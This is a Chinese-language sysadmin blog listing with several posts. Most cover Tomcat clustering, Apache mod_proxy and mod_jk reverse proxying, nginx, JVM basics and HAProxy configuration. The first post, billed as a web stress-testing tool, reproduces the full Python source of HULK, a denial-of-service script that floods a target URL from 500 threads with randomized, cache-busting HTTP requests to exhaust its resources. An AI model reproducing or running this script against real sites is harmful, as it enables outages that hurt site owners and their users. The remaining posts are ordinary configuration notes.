24_03_3_web压力测试工具-hulk 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
# ---------------------------------------------------------------------------------------------- 
# HULK - HTTP Unbearable Load King 
# 
# this tool is a dos tool that is meant to put heavy load on HTTP servers in order to bring them 
# to their knees by exhausting the resource pool, its is meant for research purposes only 
# and any malicious usage of this tool is prohibited. 
# 
#Usage: python hulk.py http://IP_or_fqdn/ safe 
# 
# author : Barry Shteiman , version 1.0 
# ---------------------------------------------------------------------------------------------- 
import urllib2 
import sys 
import threading 
import random 
import re 
 
#global params 
url='' 
host='' 
headers_useragents=[] 
headers_referers=[] 
request_counter=0 
flag=0 
safe=0 
 
def inc_counter(): 
 global request_counter 
 request_counter+=1 
 
def set_flag(val): 
 global flag 
 flag=val 
 
def set_safe(): 
 global safe 
 safe=1 
 
# generates a user agent array 
def useragent_list(): 
 global headers_useragents 
 headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3') 
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1') 
 headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1') 
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') 
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') 
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') 
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') 
 headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') 
 headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') 
 headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') 
 return(headers_useragents) 
 
# generates a referer array 
def referer_list(): 
 global headers_referers 
 headers_referers.append('http://www.google.com/?q=') 
 headers_referers.append('http://www.usatoday.com/search/results?q=') 
 headers_referers.append('http://engadget.search.aol.com/search?q=') 
 headers_referers.append('http://' + host + '/') 
 return(headers_referers) 
 
#builds random ascii string 
def buildblock(size): 
 out_str = '' 
 for i in range(0, size): 
 a = random.randint(65, 90) 
 out_str += chr(a) 
 return(out_str) 
 
def usage(): 
 print '---------------------------------------------------' 
 print 'USAGE: python hulk.py <url>' 
 print 'you can add "safe" after url, to autoshut after dos' 
 print '---------------------------------------------------' 
 
 
#http request 
def httpcall(url): 
 useragent_list() 
 referer_list() 
 code=0 
 if url.count("?")>0: 
 param_joiner="&" 
 else: 
 param_joiner="?" 
 request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 
 request.add_header('User-Agent', random.choice(headers_useragents)) 
 request.add_header('Cache-Control', 'no-cache') 
 request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 
 request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) 
 request.add_header('Keep-Alive', random.randint(110,120)) 
 request.add_header('Connection', 'keep-alive') 
 request.add_header('Host',host) 
 try: 
 urllib2.urlopen(request) 
 except urllib2.HTTPError, e: 
 #print e.code 
 set_flag(1) 
 print 'Response Code 500' 
 code=500 
 except urllib2.URLError, e: 
 #print e.reason 
 sys.exit() 
 else: 
 inc_counter() 
 urllib2.urlopen(request) 
 return(code) 
 
 
#http caller thread 
class HTTPThread(threading.Thread): 
 def run(self): 
 try: 
 while flag<2: 
 code=httpcall(url) 
 if (code==500) & (safe==1): 
 set_flag(2) 
 except Exception, ex: 
 pass 
 
# monitors http threads and counts requests 
class MonitorThread(threading.Thread): 
 def run(self): 
 previous=request_counter 
 while flag==0: 
 if (previous+100<request_counter) & (previous<>request_counter): 
 print "%d Requests Sent" % (request_counter) 
 previous=request_counter 
 if flag==2: 
 print "\n-- HULK Attack Finished --" 
 
#execute 
if len(sys.argv) < 2: 
 usage() 
 sys.exit() 
else: 
 if sys.argv[1]=="help": 
 usage() 
 sys.exit() 
 else: 
 print "-- HULK Attack Started --" 
 if len(sys.argv)== 3: 
 if sys.argv[2]=="safe": 
 set_safe() 
 url = sys.argv[1] 
 if url.count("/")==2: 
 url = url + "/" 
 m = re.search('http\://([^/]*)/?.*', url) 
 host = m.group(1) 
 for i in range(500): 
 t = HTTPThread() 
 t.start() 
 t = MonitorThread() 
 t.start()

展开全文 >>

47_02Tomcat系列之apache负载均衡请求至tomcat及Deltamanager的使用 

1
2
3
4
5
6
7
8
9
10
11
12
#scp /etc/profile.d/{java.sh tomcat.sh } 192.168.10.9:/etc/profile.d/ 
#tar xf apache-tomcat-7.0.62.tar.gz -C /usr/local 
#cd /usr/local 
# ln -sv apache-tomcat-7.0.62/ tomcat 
#scp /usr/local/tomcat/conf/server.xml 192.168.10.9:/usr/local/tomcat/conf 
 
#vim /usr/local/tomcat/conf/server.xml 
改成: 
<Engine name="Cataina"> defaultHost="www.test.com" jvmRoute="Tomcat2"> 
 
#mkdir -pv /web/webapps 
#vim /web/webapps/index.jsp

基于mod_proxy实现负载均衡

在httpd.conf的虚拟主机中配置如下内容: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
ProxyRequests Off 
<proxy balancer://lbcluster1> 
  BalancerMember ajp://192.168.10.8:8009 loadfactor=1 route=Tomcat1 
  BalancerMember ajp://192.168.10.9:8009 loadfactor=1 route=Tomcat2 
  ProxySet lbmethod=bytraffic 
</proxy> 
 
 
<VirtualHost *:80> 
  ServerName www.test.com 
  ProxyVia Off 
  ProxyPass / balancer://lbcluster1/  stickysession=jsessionid 
  ProxyPassReverse / balancer://lbcluster1/ 
    <Location /balancer-manager> 
      SetHandler balancer-manager 
      ProxyPass ! 
      Require all granted 
   </Location> 
<Proxy *> 
    Require all granted 
</Proxy> 
 <Location /> 
     Require all granted 
 </Location> 
</VirtualHost> 
 
 
# servive httpd restart

 如果出错,看日志;;

 172.16.100.106/balancer-manager 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#vim /usr/local/tomcat/conf/server.xml 
 在Engine下面添加如下内容,要根据自己需要修改的;; 
    <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"   
             channelSendOptions="8">   
       
      <Manager className="org.apache.catalina.ha.session.DeltaManager"   
               expireSessionsOnShutdown="false"   
               notifyListenersOnReplication="true"/>   
       
      <Channel className="org.apache.catalina.tribes.group.GroupChannel">   
        <Membership className="org.apache.catalina.tribes.membership.McastService"   
                    address="228.50.10.1"   
                    bind="192.168.10.8"   //我在实验时如果加上这个出错; 
                    port="45564"   
                    frequency="500"   
                    dropTime="3000"/>   
        <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"   
                  address="192.168.10.8"   
                  port="4000"   
                  autoBind="100"   
                  selectorTimeout="5000"   
                  maxThreads="6"/>   
       
        <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">   
          <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>   
        </Sender>   
        <Interceptor className="org.apache.catalina.tribes.group.interceptors.TcpFailureDetector"/>   
        <Interceptor className="org.apache.catalina.tribes.group.interceptors.MessageDispatch15Interceptor"/>   
      </Channel>   
       
      <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"   
             filter=""/>   
      <Valve className="org.apache.catalina.ha.session.JvmRouteBinderValve"/>   
       
      <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"   
                tempDir="/tmp/war-temp/"   
                deployDir="/tmp/war-deploy/"   
                watchDir="/tmp/war-listen/"   
                watchEnabled="false"/>   
       
      <ClusterListener className="org.apache.catalina.ha.session.JvmRouteSessionIDBinderListener"/>   
      <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>   
    </Cluster>      

两台Tomcat主机: 

1
2
3
4
5
6
7
8
# mkdir /web/webapps/WEB-INF 
# cp /usr/local/tomcat/conf/web.xml /web/webapps/WEB-INF/ 
# vim /web/webapps/WEB-INF/web.xml 

在=========Introduction===========上面添加: 
<distributable/> 

scp -r /web/webapps/WEB-INF/ 192.168.10.9:/web/webapps/

http://blog.csdn.net/bluishglc/article/details/6867358

展开全文 >>

46_03_实验_JDK+Tomcat+Nginx实现jsp服务器

实验环境:
192.168.122.220  www.123.com

安装jdk: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#chmod +x jdk-6u45-linux-x64-rpm.bin 
#./jdk-6u45-linux-x64-rpm.bin 
 
生成的文件在:/usr/java/目录下; 
 
[root@node1 java]#vim /etc/profile.d/java.sh 
export JAVA_HOME=/usr/java/jdk1.6.0_21 
export PATH=$PATH:$JAVA_HOME/bin 
 
 
安装Tomcat: 
[root@node1 ~]# tar xf apache-tomcat-7.0.62.tar.gz -C /usr/local 
[root@node1 ~]# cd /usr/local 
[root@node1 local]# ln -sv apache-tomcat-7.0.62/ tomcat 
[root@node1 local]#vim /etc/profile.d/tomcat.sh 
export CATALINA_HOME=/usr/local/tomcat 
export PATH=$PATH:$CATALINA_HOME/bin 
 
增加一个虚拟主机: 
[root@node1 html]# vim /usr/local/tomcat/conf/server.xml 
 
<Host name="www.123.com" appBase="/usr/share/nginx/html" 
    unpackWARs="true" autoDeploy="true"> 
    <Context path="" docBase="." /> 
</Host> 
 
[root@node1 html]# catalina.sh start 
 
配置Nginx将jsp等转到tomcat上进行处理; 
[root@node1 html]# vim /etc/nginx/conf.d/default.conf 
    location ~ \.(jsp|jspx|do)?$ { 
        proxy_set_header Host $host;                 #这个必须有,否则会跳转到webapps目录下的位置; 
        proxy_set_header X-Real-IP $remote_addr; 
        proxy_pass http://127.0.0.1:8080; 
    } 
 
测试: 
[root@node1 html]# vim /usr/share/nginx/html/hello.jsp 
<html><body><center> 
now time is: <%=new java.util.Date()%> 
</center></body></html> 
 
http://www.123.com/hello.jsp 
 
 
添加自启动: 
[root@node1 html]# chkconfig nignx on 
[root@node1 html]# vim /etc/rc.local 
catalina.sh start

在没安装nginx之前,对tomcat进行测试:

     

这个是默认的,如果想要访问的话,不能通过网站名字进行访问,只能例如http://192.168.122.220:8080进行访问;

自己添加虚拟主机,如下所示:
    
   

那么在进行访问tomcat的时候,必须是www.test.com:8080/**.jsp,否则将不会访问得到,这个要注意;;;

关于tomcat调整:
https://blog.linuxeye.com/413.html

展开全文 >>

47_01Tomcat系列之apache使用mod_proxy或mod_jk反向代理tomcat

mod_proxy:提供代理的功能,而mod_jk是作为一个独立的连接器存在,所以性能上要比较高;

  • mod_jk:mod_jk实质上是Apache与Tomcat的连接器,并藉此附带提供集群和负载均衡的功能。
  • mod_jk2:mod_jk的升级版,但官方已不再支持;

mod_proxy_http:mod_proxy提供http反向代理;

  • mod_proxy_ajp  :这个使用二进制方式传输,与通过http协议代理到后端相比,效率更高,而且在进行访问tomcat时不允许不经过反向代理过来;
  • mod_proxy_banlancer:负载均衡时用到;

如果使用tomcat做集群,建议使用httpd做反向代理;

环境配置:
tomcat主机:

  • 192.168.10.8
  • 192.168.10.9
  1. 安装jdk和tomcat. 参考:46_03(实验)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 #vim /usr/local/tomcat/conf/server.xml 
 
修改成<Engine name="Cataina"> defaultHost="www.test.com" jvmRoute="Tomcat1"> 
 
 添加 
 <Host name="www.test.com" appBase="/web" 
     unpackWARs="true"  autoDeploy="true"> 
    <Context  path="" docBase="webapps" reLoadable="true" /> 
</Host> 
 
# catalina.sh configtest 
# mkdir -pv /web/webapps  #把jsp放到这个目录下就行; 
# cd /web/webapps 
# vim index.jsp 
<html><body><center> 
now time is: <%=new java.util.Date()%> 
</center></body></html> 
 
#catalina.sh start

192.168.10.106安装httpd,对后端的Tomcat做反向代理:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
安装httpd的配置选项: 
    #./configure --prefix=/usr/local/apache \ 
     --sysconfdir=/etc/httpd \ 
     --enable-so \ 
     --enable-rewrite \ 
     --enable-ssl \ 
     --with-zlib \ 
     --with-pcre \ 
     --enable-cgi  \ 
     --enable-cgid \ 
              --enable-modules=most \ 
              --enable-deflate \ 
    --enable-mods-shared=most \ 
    --enable-mpms-shared=all \ 
    --with-mpm=event \ 
    --enable-proxy \ 
    --enable-proxy-http \ 
    --enable-proxy-ajp \ 
    --enable-proxy-balancer \ 
    --enable-lbmethod-heartbeat \ 
    --enable-heartbeat \ 
    --enable-slotmem-shm \ 
    --enable-slotmem-plain \ 
    --enable-watchdog \ 
    --with-apr=/usr/local/apr \ 
    --with-apr-util=/usr/local/apr-util

配置apache通过mod_proxy模块与tomcat连接
需要使用mod_proxy与tomcat实例连接,需要apache已经装载mod_proxy、mod_proxy_http、mod_proxy_ajp和proxy_balancer_module(实现tomcat集群时用到)等模块; 

1
2
3
4
5
6
7
8
9
10
#/usr/local/apache/bin/httpd -D DUMP_MODULES | grep proxy   #默认没有,可以在配置文件中查找proxy然后启动这些; 
proxy_module(shared) 
proxy_connect_module(shared) 
proxy_ftp_module(shared) 
proxy_http_module(shared) 
proxy_fcgi_module(shared) 
proxy_scgi_module(shared) 
proxy_ajp_module(shared) 
proxy_balancer_module(shared) 
proxy_express_module(shared) 
1
#vim /etc/httpd/httpd.conf

注释中心主机,添加

Include /etc/httpd/extra/httpd-proxy.conf

让apache跟tomcat的http连接器进行整合: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#vim /etc/httpd/extra/httpd-proxy.conf 
<VirtualHost *:80> 
  ProxyVia On 
  ProxyRequests Off      关闭正向代理; 
  ProxyPass / http://192.168.10.8:8080/ 
  ProxyPassReverse / http://192.168.10.8:8080/ 
    <Proxy *> 
        Require all granted 
    </Proxy> 
<Location /> 
             Require all granted 
        </Location> 
</VirtualHost> 
 
LoadModule slotmem_shm_module modules/mod_slotmem_shm.so 
LoadModule slotmem_plain_module modules/mod_slotmem_plain.so  #这个我没有找到,结果没问题;

重启httpd即可实现反向代理。
这个地方我没有添加httpd启动脚本,自己看前面的;;
http://172.16.100.106/index.jsp
需要着重明白这句话,所有的请求都会交给后端的Tomcat处理,httpd并不会处理任何请求,所以网页要放在tomcat指定的目录下;

 
【方式二】 配置apache跟tomcat的mod_jk连接器进行整合:   

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#tar xf tomcat-connectors-1.2.37-src.tar.gz 
#cd tomcat-connectors-1.2.37-src/native/ 
#./configure --with-apxs=/usr/local/apache/bin/apxs 
#make && make install 
 
注释掉: 
#Include /etc/httpd/extra/httpd-proxy.conf 
添加: 
Include /etc/httpd/extra/httpd-jk.conf 
 
apache要使用mod_jk连接器,需要在启动时加载此连接器模块。为了便于管理与mod_jk模块相关的配置,这里使用一个专门的配置文件/etc/httpd/extra/httpd-jk.conf来保存相关指令及其配置,其内容如下: 
#vim /etc/httpd/extra/httpd-jk.conf 
 
#Load the mod_jk 
LoadModule jk_module modules/mod_jk.so 
JkWorkersFile /etc/httpd/extra/workers.properties 
JkLogFile logs/mod_jk.log 
JkLogLevel debug 
JkMount /* Tomcat1                  送到哪一个tomcat上去,这个和上面的jvmRoute要一致; 
JkMount /status/    stat1 
 
 
 
# vim /etc/httpd/extra/workers.properties 
worker.list=Tomcat1,stat1 
worker.Tomcat1.port=8009 
worker.Tomcat1.host=192.168.10.8 
worker.Tomcat1.type=ajp13 
worker.Tomcat1.lbfactor=1 
worker.stat1.type=status

至此,一个基于mod_jk模块与后端名为Tomcat1的worker通信的配置已经完成,重新httpd服务即可生效;

展开全文 >>

46_03-实验-tomcat-httpd

环境:
tomcat server:192.168.122.115
httpd server:192.168.122.47

tomcat server:

安装jdk和tomcat: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[root@nginx tomcat]# catalina.sh version 
Using CATALINA_BASE:   /usr/local/tomcat 
Using CATALINA_HOME:   /usr/local/tomcat 
Using CATALINA_TMPDIR: /usr/local/tomcat/temp 
Using JRE_HOME:        /usr 
Using CLASSPATH:       /usr/local/tomcat/bin/bootstrap.jar:/usr/local/tomcat/bin/tomcat-juli.jar 
Server version: Apache Tomcat/8.0.30 
Server built:   Dec 1 2015 22:30:46 UTC 
Server number:  8.0.30.0 
OS Name:        Linux 
OS Version:     2.6.32-573.el6.x86_64 
Architecture:   amd64 
JVM Version:    1.7.0_79-b15 
JVM Vendor:     Oracle Corporation

需要注意的几点:

(1) 这个地方必须指定你的默认host,否则会解析到localhost上;;;
 

(2)在tomcat8上发现docBase不能指定为当前目录,这个不知为何,低版本的我试过,是可以的;

   

vim /web/html/index.jsp

1
2
3
<html><body><center> 
tomcat1 now time is: <%=new java.util.Date()%> 
</center></body></html>

httpd server:

这里省事了,没有重新编译安装httpd 

1
2
3
4
5
6
7
[root@bogon ~]#yum -y install httpd 
[root@bogon ~]# vim /etc/httpd/conf/httpd.conf 
 
ProxyRequests Off 
ProxyPassMatch ^/(.*\.jsp)$  http://192.168.122.115:8080/$1 
在这个的上面添加如上内容<Directory "/var/www/html">

重新启动httpd服务器即可;;;

如果tomcat在本地的话,那么在httpd进行反向代理的时候,仍要指定defaultHost=’www.test.com';

展开全文 >>

46_02Tomcat系列之java初涉

安装jdk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#chmod +x jdk-6u45-linux-x64-rpm.bin 
#./jdk-6u45-linux-x64-rpm.bin 
 
生成的文件在:/usr/java/目录下; 
 
#vim /etc/profile.d/java.sh 
export JAVA_HOME=/usr/java/jdk1.6.0_21 
export PATH=$PATH:$JAVA_HOME/bin 
 
#java -version 
 
查看java虚拟机的参数: 
#java --XX:+PrintFlagsFinal 
 
java配置参数: 
 
#java --XX:+<option>   :开启此参数指定的功能 
#java --XX:-<option>    :关闭功能 
#java --XX:<option>=<value>  :给option指定的选项赋值

-D=:设定系统属性值

Sun JDK监控和故障处理工具:

  • jps,JVM Process Status Tool:显示指定系统内所有的HotSpot虚拟机进程的列表信息
  • jstat,JVM Statistics Monitoring Tool:手机并显示HotSpot虚拟机各方面的运行数据
  • jinfo:显示正在运行的某HotSpot虚拟机配置信息
  • jmap:生成某HotSpot虚拟机的内存转存快照
    可视化工具:
  • jconsole:Java的监控与管理控制台
  • jvisualvm:可视化的VM

展开全文 >>

46_01Tomcat系列之java初涉

POSIX:Portable Operating System

API(Application Programming Interface)
ABI(Application Binary Interface)

JAVA

包含四个独立却又彼此相关的技术

  • java程序设计语言
  • java API
  • java class文件格式
  • JVM:java virtual machine

.java ——-> .class (bytecode)

JVM的实现方式

  1. 一次性解释器,解释字节码并执行
  2. 即时编译器(just-in-time conplier)
        依赖于更多内存缓存解释后的结果
  3. 自适应编译器
        缓存20%左右代码,提高80%左右的速度;

JVM: Hotspot JVM

    JRE: java运行时环境
    JDK:java 开发环境

JDK=Java+API+JVM,是用于实现java程序开发的最小环境
JRE=JVM+java SE API

JAVA应用领域的不同,JAVA可分为三类:

    JAVA SE: Standard Edtion
    JAVA EE: Enterprise Edition
    JAVA ME:Mobile Edtion

applet:小应用程序是采用Java编程语言编写的程序,该程序可以包含在 HTML(标准通用标记语言的一个应用)页中,与在页中包含图像的方式大致相同。
由于其安全性问题,出现了CGI;

CGI:然后JSP;

JSP:Java Server Page

线程共享内存区

  • 程序计数器
  • java虚拟机栈

线程共享内存区

  • 方法区
  • 堆:java自动内存回收(Garbage Collector)

垃圾回收算法

  • 标记-清除
  • 复制
  • 标记-整理

垃圾回收器

  • Serial
  • ParNew
  • Parallel Scavenge
  • Serial Old
  • Parallel Old

CMS:Concurrent Mark Sweep
    特点:并发收集、低停顿
    缺点:无法回收浮动垃圾、由于基于标记-清除算法,所以会产生碎片;

展开全文 >>

45_02http反向代理及haproxy

配置实例: 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
#Global settings 
# 
global 
    log         127.0.0.1 local2 
    chroot         /var/lib/haproxy 
    pidfile        /var/run/haproxy.pid 
    maxconn    4000 
    user        haproxy 
    group        haproxy 
    spread-check 3 
    nbproc 1 
    daemon 
 
defaults 
    mode             http 
    log            global 
    option            httplog 
    option            httpclose 
    option            dontlognull 
    option    http-server-close 
    option     forwardfor     except 127.0.0.0/8 
    option            redispatch 
    retries             3 
    timeout http-request    10s 
    timeout queue        1m 
    timeout connect    10s 
    timeout client        1m 
    timeout server      1m 
    timeout http-keep-alive 10s 
    timeout check         10s 
    maxconn        3000 
 
listen stats 
    mode     http 
    bind    0.0.0.0:1080 
    stats    enable 
    stats     hide-version 
    stats     uri    /haproxyadmin?stats 
    stats     realm    Haproxy\ Statistics 
    stats     auth     admin:admin    这个要修改 
    stats     admin       if     TRUE 
 
frontend    http-in 
    bind     *:80 
    mode     http 
    log     global 
    option    httpclose 
    option     logasap 
    option     dontlognull 
    capture        request     header     Host     len     20 
    capture     request     header    Referer len     60 
    default_backend     servers 
 
frontend     healthcheck 
    bind    :1099 
    mode     http 
    option    httpclose 
    option     forwardfor 
    default_backend     servers 
 
backend     servers 
    balance     roundrobin 
    server     websrv1     192.168.10.11:80     check     maxconn     2000 
    server     websrv2     192.168.10.12:80    check     maxconn    2000

规划 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
director: 
eth0: 172.16.100.107 
eth0: 192.168.10.7 
 
realserver:         route: 
192.168.10.11        192.168.10.7 
192.168.10.12        192.168.10.7 
 
director: 
    #yum  -y install haproxy 
    #cp /etc/haproxy/haproxy.conf /root/ 
    #vim /etc/sysconfig/rsyslog 
    改为: 
    SYSLOGD_OPTIONS="-c 2 -r" 
    #vim /etc/haproxy/haproxy.conf 
    添加 local2.*     /var/log/haproxy.log 
    #service haproxy start            先确保日志是否正确,然后再更改配置文件 
  
#service haproxy restart 
 
访问172.16.100.107 
 
访问状态: 
172.16.100.107:1080/haproxyadmin?stats 
用户,密码:admin admin 
 
当一台服务器停止了,会有显示的 
 
 
关于对mysql实现负载均衡: 
 
listen ..... 
 
frontend mysql 
    bind *:3306 
    mode tcp 
    log global 
    default_backend mysqlservers 
 
backend mysqlservers 
    balance leastconn 
    server dbsrv1  192.168.10.11:3306 check port 3306 intval 2 rise 1 fall 2   maxconn   300 
    server dbsrv2  192.168.10.12:3306 check port 3306 intval 2 rise 1 fall 2   maxconn   300

实验:
Keepalived + haproxy
Keepalived + nginx

这个地方只是最简单的,可自行参考《构建高可用Linux服务器》

展开全文 >>

45_01http反向代理及haproxy

  1. HAProxy是工作在网络7层之上。
  2. 能够补充Nginx的一些缺点比如Session的保持,Cookie的引导等工作
  3. 支持url检测后端的服务器出问题的检测会有很好的帮助。
  4. 更多的负载均衡策略比如:动态加权轮循(Dynamic Round Robin),加权源地址哈希(Weighted Source Hash),加权URL哈希和加权参数哈希(Weighted Parameter Hash)已经实现
  5. 单纯从效率上来讲HAProxy更会比Nginx有更出色的负载均衡速度。
  6. HAProxy可以对Mysql进行负载均衡,对后端的DB节点进行检测和负载均衡。

如果做负载均衡,建议使用haproxy;;
由于haproxy是单进程的程序,在处理高并发的时候会做的很好,当然由于单进程,在多CPU的场景中,就要对haproxy进行调整,以便能够有效利用多CPU;

配置HAProxy

  1. 配置文件格式

HAProxy的配置处理3类主要参数来源:

  • 最优先处理的命令行参数;
  • “global”配置段,用于设定全局配置参数;
  • proxy相关配置段,如”defaults”、”listen”、”frontend”和”backend”;
  1. 时间格式

一些包含了值的参数表示时间,如超时时长,这些值一般以毫秒为单位,但也可以使用其他的时间单位后缀。

  • us:微秒,即1/1000000秒;
  • ms:毫秒,即1/1000秒;
  • s:秒
  • m:分钟
  • h:小时
  • d:天
  1. 例子

下面的例子配置了一个监听在所有接口的80端口上HTTP proxy服务,它转发所有的请求至后端监听在127.0.0.1:8000上的”server”.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
global
    daemon
    maxconn 25600

defaults
    mode http
    timeout connect 5000ms
    timeout client     50000ms
    timeout server    50000ms

frontend http-in
    bind *:80
    default_backend servers

backend servers
    server server1 127.0.0.1:8080 maxconn 32
  1. 全局配置

“global”配置中的参数为进程级别的参数,且通常与其运行的OS相关;

*进程管理及安全相关的参数

  • chroot :修改haproxy的工作目录至指定的目录并在放弃权限之前执行chroot()
    操作,可以提升haproxy的安全级别,不过需要注意的是要确保指定的目录为空目录且任何用户均不能有写权限;
  • daemon:让haproxy以守护进程的方式工作于后台,其等同于”-D”选项的功能,当然,也可以在命令行中以”-db”选项将其禁用;
  • gid:以指定的GID运行haproxy,建议使用专用于运行haproxy的GID,以免因权限问题带来风险;
  • group :同gid,不过指定的组名;
  • log
    [max level][min level]]:定义全局的syslog服务器,最多可以定义两个
  • log-send-hostname[]:在syslog信息的首部添加当前主机名,可以为”string”指定的名称,也可以缺省使用当前主机名;
  • nbproc:指定启动的haproxy进程个数,只能用于守护进程模式的haproxy,默认只启动一个进程,鉴于调试困难等多方面的原因,一般只在单进程仅能打开少数文件描述符的场景中才使用多进程模式;
  • pidfile;
  • uid:以指定的UID身份运行haproxy进程

  • ulimit-n : 设定每进程所能够打开的最大文件描述符数目,默认情况下其会自动进行计算,因此不推荐修改此选项;
  • user:同uid,但使用的是用户名;
  • stats:
  • node:定义当前节点的名称,用户HA场景中多haproxy进程共享同一个IP地址时;
  • description:当前实例的描述信息;

*性能调整相关的参数

  • maxconn :设定每个haproxy进程所接收的最大并发连接数,其等同于命令行选项”-n”;”ulimit -n”自动计算的结果正是参照此参数设定的;
  • maxpipes :haproxy使用pipe完成基于内核的tcp报文重组,此选项则用于设定每进程所允许使用的pipe个数,每个pipe会打开两个文件描述符,因此,”ulimit -n”自动计算时会根据需要调大此值,默认为maxconn/4,其通常会显得过大;
  • noepoll:在Linux系统上禁用epoll机制;
  • nokqueue:在BSD系统上禁用kqueue机制;
  • nopoll:禁用poll机制;
  • nosepoll:禁用poll机制;
  • nosplice:禁止在Linux套接字上使用内核tcp重组,这回导致更多的recv/send系统调用,不过,在Linux 2.6.25-28系列的内核上,tcp重组功能有bug存在;
  • spread-checks <0..50,in percent>:在haproxy后端有着众多服务器的场景中,在精确的时间间隔后统一对众服务器进行健康状况检查可能会带来意外问题:此选项用于将其检查的时间间隔长度上增加或减小一定的随机时长;
  • tune,bufsize :设定buffer的大小,同样的内存条件下,较小的值可以让haproxy有能力接收更多的并发连接,较大的值可以让某些应用程序使用较大的cookie信息:默认是16384,其可以在编译时修改,不过强烈建议使用默认值;
  • tune.chksize :设定检查缓冲区的大小,单位为字节,更大的值有助于在较大的页面中完成基于字符串或模式的文本查找,但也会占用更多的系统资源,不建议修改;
  • tune.maxaccept :设定haproxy进程内核调度运行时一次性可以接收的连接的个数,较大的值可以带来较大的吞吐率,默认在单进程模式下为100,多进程模式下为8,设定为-1可以禁止此限制;一般不建议修改;
  • tune.maxrewrite :设定为首部重写或追加而预留的缓冲空间,建议使用1024左右的大小,在需要使用更大的空间时,haproxy会自动增加其值;
  • tune.rcvbuf.server :设定内核套接字中服务端或客户端接收缓冲的大小,单位为字节,强烈建议使用默认值;
  • Debug相关的参数
  • debug
  • quiet
  1. 代理

代理相关的配置可以如下配置段中。

  • defaults
  • frontend
  • backend
  • listen

“defaults”段用于为所有其他配置段提供默认参数,这配置默认参数可由下一个”defaults”所重新设定;
“frontend”段可用于定义一系列监听的套接字,这些套接字可接收客户端请 求并与之建立连接;
“backend”段用于定义一系列”后端”服务器,代理将会将对应客户端的请求转发至这些服务器
“listen”段通过关联”前端”和”后端”定义一个完整的代理,通常只对TCP流量有用;
所有代理的名称只能使用大写字母,小写字母,数字,中线,下划线,点号,冒号,此外,ACL名称会区分字母大小写;

  

配置文件中的关键字参考

  1. balance

balance []
balance url_param [check_post[max_wait]]

定义负载均衡算法,可用于”defaults”、”listen”和”backend”。
